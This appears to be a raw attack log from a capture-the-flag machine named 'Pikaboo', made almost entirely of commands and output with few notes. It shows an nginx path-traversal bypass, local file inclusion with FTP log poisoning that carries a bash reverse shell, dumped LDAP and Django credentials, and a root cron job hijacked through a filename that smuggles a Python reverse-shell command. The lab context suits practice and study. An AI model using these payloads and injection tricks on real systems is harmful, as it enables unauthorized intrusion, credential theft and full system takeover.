$ nmap -p- -T4 -A 10.129.141.174
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f (RSA)
| 256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 (ECDSA)
|_ 256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Pikaboo
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
$ dirb http://10.129.141.174
---- Scanning URL: http://10.129.141.174/ ----
+ http://10.129.141.174/admin.php (CODE:403|SIZE:274)
==> DIRECTORY: http://10.129.141.174/images/
+ http://10.129.141.174/index.php (CODE:200|SIZE:6922)
---- Entering directory: http://10.129.141.174/images/ ----
$ nikto -h http://10.129.141.174
+ Server: nginx/1.14.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8067 requests: 0 error(s) and 14 item(s) reported on remote host
bypass nginx conf issue with /admin../admin_staging/ and use the lfi to read the vsftpd log file, then inject php with the username
http://pikaboo.htb/admin../admin_staging/
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
$ ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://pikaboo.htb/admin../admin_staging/index.php?page=FUZZ' -fs 15349
/var/log/lastlog [Status: 200, Size: 307641, Words: 3272, Lines: 368]
/var/log/vsftpd.log [Status: 200, Size: 19803, Words: 3893, Lines: 414]
/var/log/wtmp [Status: 200, Size: 167029, Words: 3288, Lines: 559]
http://pikaboo.htb/admin../admin_staging/index.php?page=/var/log/vsftpd.log
view the ftp log from the lfi in the webpage, it means that if we put a php code in the ftp login, it's written to the ftp log, and when doing lfi - we executing this php code in the logs
kali@kali:~/0.htb/release_arena/Pikaboo$ nc -lvnp 4444
kali@kali:~/0.htb/release_arena/Pikaboo$ ftp pikaboo.htb
Connected to pikaboo.htb.
220 (vsFTPd 3.0.3)
Name (pikaboo.htb:kali): <?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.51/4444 0>&1'"); ?>
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp>
refresh http://pikaboo.htb/admin../admin_staging/index.php?page=/var/log/vsftpd.log
kali@kali:~/0.htb/release_arena/Pikaboo$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.51] from (UNKNOWN) [10.129.142.101] 47618
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cat /home/pwnmeow/user.txt
a571ef25b8387baba59bc0e71297087e
cat /opt/pokeapi/config/settings.py
DATABASES = {
"ldap": {
"ENGINE": "ldapdb.backends.ldap",
"NAME": "ldap:///",
"USER": "cn=binduser,ou=users,dc=pikaboo,dc=htb",
"PASSWORD": "J~42%W?PFHl]g",
},
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": "/opt/pokeapi/db.sqlite3",
}
}
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
},
}
}
SECRET_KEY = os.environ.get(
"SECRET_KEY", "ubx+22!jbo(^x2_scm-o$*py3e@-awu-n^hipkm%2l$sw$&2l#"
)
CUSTOM_APPS = (
"tastypie",
"pokemon_v2",
)
ss
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
u_str ESTAB 0 0 * 12535 * 11835
u_str ESTAB 14 0 * 94555 * 95385
u_str ESTAB 0 0 /run/systemd/journal/stdout 13467 * 13069
u_str ESTAB 0 768 /var/run/slapd/ldapi 116233 * 117236
u_str ESTAB 0 0 * 13206 * 13486
u_str ESTAB 14 0 * 117236 * 116233
u_str ESTAB 0 768 /var/run/slapd/ldapi 95385 * 94555
u_str ESTAB 0 0 /var/run/slapd/ldapi 94552 * 95375
... ...
ldapsearch -x -LLL -h 127.0.0.1 -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w J~42%W?PFHl]g -b 'dc=ftp,dc=pikaboo,dc=htb' -s sub '(objectClass=*)'
dn: dc=ftp,dc=pikaboo,dc=htb
objectClass: domain
dc: ftp
dn: ou=users,dc=ftp,dc=pikaboo,dc=htb
objectClass: organizationalUnit
objectClass: top
ou: users
dn: ou=groups,dc=ftp,dc=pikaboo,dc=htb
objectClass: organizationalUnit
objectClass: top
ou: groups
dn: uid=pwnmeow,ou=users,dc=ftp,dc=pikaboo,dc=htb
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
uid: pwnmeow
cn: Pwn
sn: Meow
loginShell: /bin/bash
uidNumber: 10000
gidNumber: 10000
homeDirectory: /home/pwnmeow
userPassword:: X0cwdFQ0X0M0dGNIXyczbV80bEwhXw==
$ echo X0cwdFQ0X0M0dGNIXyczbV80bEwhXw== | base64 -d
_G0tT4_C4tcH_'3m_4lL!_
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /usr/local/bin/csvupdate_cron
cat csvupdate_cron
#!/bin/bash
for d in /srv/ftp/*
do
cd $d
/usr/local/bin/csvupdate $(basename $d) *csv
/usr/bin/rm -rf *
done
$ touch "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.51\",5555));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"
$ nc -lvnp 5555
listening on [any] 5555 ...
$ ftp pikaboo.htb
Connected to pikaboo.htb.
220 (vsFTPd 3.0.3)
Name (pikaboo.htb:kali): pwnmeow
331 Please specify the password.
Password:_G0tT4_C4tcH_'3m_4lL!_
ftp> cd items
ftp> put *
mput |python -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.51",1234));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")';echo .csv? n
mput |python -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.51",5555));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")';echo .csv? y
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5 bytes sent in 23.09 secs (0.0002 kB/s)
ftp>
kali@kali:~/0.htb/release_arena/Pikaboo$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.51] from (UNKNOWN) [10.10.14.51] 49354
$
kali@kali:~/0.htb/release_arena/Pikaboo$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.51] from (UNKNOWN) [10.129.142.101] 53744
# kali@kali:~/0.htb/release_arena/Pikaboo$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.51] from (UNKNOWN) [10.129.142.101] 53744
# id
id
uid=0(root) gid=0(root) groups=0(root)
# ls
ls
# pwd
pwd
/srv/ftp/items
# cd /root
cd /root
# ls
ls
root.txt vsftpd.log
# cat root.txt
cat root.txt
931dbd972124889ce1223fbb56489526
#